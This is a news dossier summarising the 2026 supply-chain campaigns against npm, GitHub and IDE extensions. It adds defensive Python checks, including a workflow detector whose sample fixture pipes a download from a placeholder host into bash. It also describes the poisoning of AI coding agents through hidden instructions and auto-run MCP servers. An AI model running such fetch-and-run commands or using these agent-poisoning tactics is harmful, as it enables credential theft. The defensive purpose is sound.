A coordinated wave of supply-chain attacks has swept npm, GitHub and other package ecosystems, exploiting compromised maintainer accounts, poisoned VS Code extensions and automated CI workflows. Campaigns dubbed TrapDoor, Megalodon and Mini Shai-Hulud (linked to TeamPCP/UNC6780) injected backdoored packages and malicious commits into thousands of repos and packages, harvesting tokens, cloud keys and developer credentials and propagating via automated commits and package publishing. The incidents expose weaknesses in extension distribution, CI governance, provenance checks and developer endpoints, prompting urgent mitigation: rotate credentials, enforce 2FA and signed releases, audit lockfiles, harden CI policies, sandbox AI coding agents, and adopt stricter dependency practices.
The campaign demonstrates how developer tooling and CI can be weaponized to corrupt vast open-source supply chains, raising systemic risk for software projects and cloud deployments. Tech professionals must reassess dependency trust, CI controls, and credential hygiene to limit propagation and impact.
Dossier last updated: 2026-05-23 12:39:58
Researchers uncovered a coordinated supply-chain campaign called TrapDoor that has injected malicious packages into npm, PyPI, and Crates.io to target developers — especially in Web3, Solana/Sui, and AI tooling — and to poison AI coding agents that auto-import dependencies. The operation spans at least 34 malicious packages and 384 downstream versions, using typosquatting, dependency confusion, and payload delivery that activates when repositories or developer environments are detected. Security teams warn this increases risk for CI pipelines, package managers, and automated coding assistants that fetch libraries, potentially allowing credential theft, remote code execution, or unauthorized access. The finding matters because it escalates attacker focus on developer supply chains and AI-driven workflows, requiring tighter provenance checks, dependency scanning, and runtime protections.
Researchers reported in May 2026 that VS Code extensions NX Console and TeamPCP were compromised after attackers injected malicious code via a GitHub breach. Maintainers are rolling out patches and users are urged to update or remove affected extensions, audit dependencies, and check for suspicious developer-environment behavior. The incident highlights supply-chain risks for IDE extensions and the broader developer tool ecosystem, where a single repository compromise can push malware to many developers. Organizations should treat extension hygiene as part of security posture and monitor for unusual network or build activity.
Ionut Arghire / SecurityWeek: More than 5,500 GitHub repositories were infected with malware in a supply chain attack, dubbed Megalodon, on May 18 that relies on automated commits. Fake automated commits injected GitHub Actions workflows containing payloads to steal credentials, CI secrets, keys, and tokens.
The Chinese National Cybersecurity Reporting Center warned that npm, the leading JavaScript package registry, was hit by a supply-chain poisoning campaign dubbed “Shai-Hulud.” Attackers compromised npm maintainer accounts and pushed hundreds of malicious package versions across more than 300 packages, enabling worm-like propagation. Malicious installers execute on developer machines and CI/CD environments to exfiltrate GitHub and npm tokens, cloud keys, SSH keys, Kubernetes credentials and DB strings, then reuse stolen npm publish rights to backdoor additional packages. Affected projects include echarts-for-react, multiple @antv libraries, 42 TanStack packages, Mistral AI PyPI packages and timeago.js. Authorities advised isolating infected hosts, auditing lockfiles and install scripts, cleaning leftover artifacts, rotating credentials and tightening dependency vetting.
Security researchers have identified a supply-chain campaign called “TrapDoor” that distributed malicious packages to npm, PyPI, and Crates.io to steal developer credentials and sensitive data. The packages attempted to exfiltrate AWS keys, GitHub tokens, SSH keys, browser data, and crypto-wallet information from developer machines and environments. Unusually, some payloads used hidden Unicode instructions to target AI workflow artifacts and files such as .cursorrules and CLAUDE.md, suggesting the attackers aimed to exploit emerging AI toolchains and prompt repositories. This matters because package-ecosystem compromises can rapidly affect many projects and infrastructure, highlighting ongoing risks in open-source dependencies and the need for stronger supply-chain protections.
A GitHub breach discovered in May 2026 compromised several popular developer extensions — notably NX Console, multiple VS Code integrations, and TeamPCP — by injecting malicious code into repositories and releases. The incident exposes a harmful software supply-chain vector affecting developers who install or update these extensions, potentially enabling backdoors, credential theft, or further propagation. GitHub and affected maintainers are investigating and issuing advisories and mitigations; users are urged to audit installations, rotate credentials, and verify checksums and provenance for extension packages. The episode underscores persistent risks in dependency management and the need for stronger supply-chain protections, code integrity checks, and developer-security hygiene.
Node.js projects face growing risk from npm supply-chain attacks and RCE vectors that hide in trusted dependencies, typosquatted packages, malicious install scripts, or dependency confusion. The article gives practical, CI-focused defenses: always commit lockfiles and use npm ci for reproducible installs; pin exact dependency versions and rely on automated PR tools (Dependabot/Renovate) for controlled updates; adopt a 30-day delay before consuming new releases so community scrutiny can surface malicious packages; and disable npm lifecycle scripts (ignore-scripts=true) to block postinstall/backdoor execution. Combined with pipeline guards, these steps reduce the chance a compromised package executes in production.
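As an added example that is not from the article, the check below audits a project's package.json and .npmrc against the controls listed above (committed lockfile, exact version pins, ignore-scripts); `save-exact` is npm's own setting that keeps future `npm install` calls from recording range specifiers, and the 30-day release delay is left to Dependabot/Renovate configuration rather than checked here. The sample manifests are constructed.

```python
import json
import re

# Exact semver only: no ^ or ~ prefixes, ranges, tags, or wildcards.
EXACT = re.compile(r"^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$")
DEP_FIELDS = ("dependencies", "devDependencies", "optionalDependencies")


def unpinned(package_json: str) -> list[str]:
    """'name@spec' for every dependency whose spec is not an exact version."""
    manifest = json.loads(package_json)
    return sorted(
        f"{name}@{spec}"
        for field in DEP_FIELDS
        for name, spec in manifest.get(field, {}).items()
        if not EXACT.match(spec)
    )


def npmrc_settings(npmrc: str) -> dict[str, str]:
    """key=value pairs from an .npmrc, skipping blank and comment lines."""
    settings = {}
    for line in npmrc.splitlines():
        line = line.strip()
        if line and not line.startswith(("#", ";")) and "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip()] = value.strip()
    return settings


def audit(package_json: str, npmrc: str, lockfile_committed: bool) -> list[str]:
    """One finding per control from the guidance that the project does not meet."""
    findings = []
    if not lockfile_committed:
        findings.append("no lockfile committed: 'npm ci' cannot reproduce installs")
    findings += [f"unpinned dependency {dep}: pin an exact version" for dep in unpinned(package_json)]
    settings = npmrc_settings(npmrc)
    if settings.get("ignore-scripts") != "true":
        findings.append("ignore-scripts is not true: install scripts will run")
    if settings.get("save-exact") != "true":
        findings.append("save-exact is not true: 'npm install' will record ^ ranges")
    return findings


# Constructed samples: one project on npm defaults, one following the guidance above.
WEAK_PKG = json.dumps({"dependencies": {"express": "^4.18.2", "lodash": "4.17.21"}})
WEAK_NPMRC = "# defaults only\n"
HARDENED_PKG = json.dumps({"dependencies": {"express": "4.18.2", "lodash": "4.17.21"}})
HARDENED_NPMRC = "ignore-scripts=true\nsave-exact=true\n"
```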
Researchers uncovered an automated campaign called Megalodon that injected malicious commits into over 5,500 GitHub repositories, pushing CI/CD credential-stealing malware that exfiltrates AWS, GCP, and Azure credentials, SSH keys, Docker/Kubernetes configs, Vault and Terraform tokens, and GitHub/Bitbucket tokens. SafeDep traced the compromise to poisoned source in a legitimate npm package (Tiledesk versions 2.18.6–2.18.12) published by a maintainer who unknowingly pushed backdoored code after the repository itself was compromised. Ox Security researcher Moshe Siman Tov Bustan warns this represents a new era of supply-chain attacks and urges platform vendors like GitHub and npm to do more to stop malicious code reaching servers. Analysts say Megalodon appears distinct from TeamPCP despite behavioral overlap.
Security researchers uncovered 'Megalodon,' an automated campaign that pushed malicious commits into at least 5,561 GitHub repositories to steal CI/CD and cloud credentials. SafeDep and Ox Security traced the injected code — sometimes published into npm packages like Tiledesk — to commits that, if merged, execute inside CI/CD pipelines to exfiltrate AWS, GCP, and Azure credentials, SSH keys, Docker/Kubernetes configs, Vault and Terraform secrets, and GitHub/Bitbucket tokens. Investigators say Megalodon resembles earlier TeamPCP supply-chain attacks but is likely a distinct actor copying tactics. Researchers warn the wave highlights systemic risks in open-source supply chains and call for stronger platform-side protections from GitHub, npm, and others to block malicious code before it reaches repositories.
Security researchers uncovered the “Megalodon” campaign that backdoored more than 5,000 GitHub repositories by abusing GitHub Actions workflows. Attackers used throwaway or compromised accounts and weak branch protections to inject malicious CI steps that download and run infostealer malware from external URLs, turning supply-chain automation into a mass distribution vector. OX Security and SafeDep led analysis, highlighting how automated CI/CD environments, token permissions, and insufficient repository safeguards allowed rapid propagation. The incident matters because it shows how modern development workflows and ephemeral contributor accounts can be weaponized to exfiltrate secrets and compromise developer and enterprise infrastructure, prompting urgent need for stricter branch policies, least-privilege tokens, and CI workflow auditing.
Security researchers disclosed a supply-chain campaign called “Megalodon” that has compromised over 5,500 GitHub repositories by injecting malicious code into open-source projects and package manifests. The campaign leverages compromised accounts, credential stuffing, and repo takeover to introduce backdoors and typosquatted dependencies, enabling downstream supply-chain contamination across npm, PyPI and other ecosystems. Major risks include silent propagation to downstream projects, automated CI/CD workflows pulling poisoned packages, and credential exposure via leaked tokens. This matters because it undermines open-source trust, threatens millions of users/deployments relying on affected libraries, and highlights gaps in repository access controls, dependency verification, and package registry protections. Mitigations include rotating credentials, enforcing 2FA, dependency pinning and supply-chain scanning.
Security researchers disclosed a large-scale supply-chain attack on GitHub, dubbed "Megalodon," that compromised over 5,500 repositories by injecting malicious code into open-source packages and projects. The campaign exploited compromised accounts and package publishing workflows to push backdoored updates that could exfiltrate credentials or run arbitrary commands. Affected projects span multiple languages and ecosystems, increasing risk for downstream users and dependent software. GitHub and maintainers are urged to rotate credentials, audit recent commits and package releases, and enforce multi-factor authentication and signed commits/packages. The incident highlights persistent threats to the software supply chain and the need for stronger repository hygiene, dependency monitoring, and platform-level protections.
On May 18–19 attackers used stolen maintainer credentials to publish hundreds of malicious npm package versions that passed Sigstore provenance checks because the adversary could obtain valid signing certificates. The Mini Shai-Hulud campaign (attributed to TeamPCP) and a separate compromise of the Nx Console VS Code extension led to thousands of installs and harvesting of cloud credentials, tokens, and 1Password vaults. Researchers from Endor Labs, Socket, StepSecurity, Adversa AI, Johns Hopkins, Microsoft MSRC and others say the developer-tool verification model is broken: CI, Sigstore, IDE/extension credential storage, agent frameworks, and AI coding CLIs all expose attack surfaces. Notably, TrustFall showed AI coding CLIs auto-execute project MCP servers with full privileges, enabling secret exfiltration and supply-chain propagation.
A cybercriminal group called TeamPCP has escalated software supply-chain attacks into a persistent campaign, recently breaching GitHub after a developer installed a malicious VSCode extension and claiming access to roughly 3,800–4,000 internal repositories. Security firms say TeamPCP has executed about 20 waves of attacks in months, tainting 500+ distinct open-source projects and using infected developer tools to steal credentials, publish malicious packages, and later extort victims. The group reportedly automates propagation with a self-spreading worm dubbed Mini Shai-Hulud that creates repositories with stolen encrypted credentials, accelerating a self-perpetuating “flywheel” of compromises across developer ecosystems. The spree heightens systemic risk for software supply chains and developer trust.
GitHub confirmed a major software supply-chain breach after attackers from the criminal group TeamPCP used a poisoned VSCode extension to access roughly 3,800–4,000 internal repositories and posted stolen source code for sale. Security firms say TeamPCP has run an unprecedented, sustained campaign—about 20 waves in recent months—tainting more than 500 distinct open-source packages and using planted malware to steal credentials, publish backdoored releases, and breach downstream companies including OpenAI and Mercor. Analysts warn TeamPCP automated much of the campaign with a self-spreading worm (Mini Shai-Hulud), creating a repeatable “flywheel” that amplifies supply-chain compromise risk across developer toolchains and critical software infrastructure.
Megalodon: Mass GitHub Repo Backdooring via CI Workflows
New guidance urges JavaScript developers to switch from npm to pnpm to reduce supply-chain risk and improve performance. The recommendation, highlighted in a blog post and shared on Reddit, argues pnpm’s strict node_modules layout, deterministic lockfile handling and stricter dependency resolution lower exploit surface and accidental package hoarding. It notes pnpm’s faster installs and disk-space savings as operational benefits, and warns that npm’s looser hoisting and flat dependency model can enable malicious packages and make attacks harder to contain. The piece matters because package manager choice affects millions of Node.js projects and can materially improve security posture and developer productivity with relatively low migration effort.
Mitchell Hashimoto, a longtime GitHub user, publicly announced he's leaving after repeated GitHub outages and reliability issues, amplifying wider developer discontent as major customers and OpenAI explore alternatives. Recent crises include a May 21st breach where a poisoned VS Code extension exposed credentials and led to 3,800+ internal repositories being compromised and offered for sale, plus a disclosed 0-day in Git infrastructure. Internal upheaval followed Microsoft reorganizing GitHub under CoreAI, removing the CEO role and triggering executive departures. Competition from Cursor and Claude Code, rising Copilot costs and unsustainable AI inference expenses, and migration projects to Azure that caused downtime have worsened trust. The story matters because GitHub's stability, security and business model affect the global developer ecosystem and Microsoft’s cloud margins.
A widely used JavaScript template package, art-template, was confirmed as the latest victim of a supply-chain attack on the npm ecosystem, where attackers have controlled the repository since 2025 and injected unauthorized remote JavaScript (including calls to Baidu Analytics). Developers and sysadmins raced to assess exposure across projects that pull dependencies via npm, which the article argues is the dominant vector for such incidents. Users quoted describe a sense of helplessness and point to weak maintainer account security as a root cause; the breach underscores ongoing risks in package-manager distributed dependencies and the need for stronger supply-chain practices. Upstream art-template documentation has been published with details.
On May 18, 2026, a campaign dubbed Megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories in six hours, injecting GitHub Actions workflows that exfiltrate CI secrets, cloud credentials, SSH keys, OIDC tokens and source code artifacts to a C2 at 216.126.225.129:8443. The attacker used throwaway accounts and forged identities (build-bot, auto-ci, ci-bot, pipeline-bot) and deployed two variants: a mass SysDiag workflow that triggers on push and pull_request_target, and a targeted Optimize-Build variant that replaces workflows and exposes a workflow_dispatch backdoor. The campaign also propagated via the npm package @tiledesk/tiledesk-server (v2.18.6–2.18.12). This matters because CI workflow compromise allows large-scale credential theft and cloud identity impersonation, threatening downstream supply chains and cloud environments.
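An added defender-side example, not from the write-up above: it scores a workflow file and its commit author against the signals the summary names (forged bot identities, the pull_request_target and workflow_dispatch triggers, and a step that downloads a script and pipes it into a shell). It reads the `on:` section with a small regex parser rather than a YAML library, and both sample workflows are constructed.

```python
import re

# Forged committer identities and the workflow triggers named in the summary above.
FORGED_IDENTITIES = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}
RISKY_TRIGGERS = {"pull_request_target", "workflow_dispatch"}  # runs with repo secrets / on demand
FETCH_AND_RUN = re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b")  # download piped into a shell
EVENTS = re.compile(r"push|pull_request_target|pull_request|workflow_dispatch|schedule")


def triggers(workflow: str) -> set[str]:
    """Event names from the top-level 'on:' key: scalar, inline list, or indented block."""
    lines = workflow.splitlines()
    for i, line in enumerate(lines):
        if not line.startswith("on:"):
            continue
        rest = line[3:].strip()
        if rest:  # on: push   or   on: [push, pull_request_target]
            return set(re.findall(r"\b(" + EVENTS.pattern + r")\b", rest))
        found = set()
        for nxt in lines[i + 1:]:  # block form: indented event keys until the next top-level key
            if nxt.strip() and not nxt[0].isspace():
                break
            key = re.match(r"^\s+(\w+):", nxt)
            if key and EVENTS.fullmatch(key.group(1)):
                found.add(key.group(1))
        return found
    return set()


def findings(workflow: str, author: str) -> list[str]:
    """One finding per matched signal; an empty list means nothing suspicious was seen."""
    out = []
    if author in FORGED_IDENTITIES:
        out.append(f"commit author '{author}' matches a forged CI identity")
    risky = triggers(workflow) & RISKY_TRIGGERS
    if risky:
        out.append("privileged or on-demand trigger: " + ", ".join(sorted(risky)))
    if FETCH_AND_RUN.search(workflow):
        out.append("a step downloads a script and pipes it into a shell")
    return out


# Constructed samples: a workflow with the mass-variant shape, and an ordinary CI workflow.
SUSPECT = ("on:\n  push:\n  pull_request_target:\n"
           "jobs:\n  diag:\n    steps:\n      - run: curl -fsSL https://example.invalid/diag.sh | bash\n")
BENIGN = "on: [push, pull_request]\njobs:\n  test:\n    steps:\n      - run: npm ci && npm test\n"
```

Run the same check over every file under .github/workflows in a suspicious commit; any finding is a reason to hold the merge and review the step by hand.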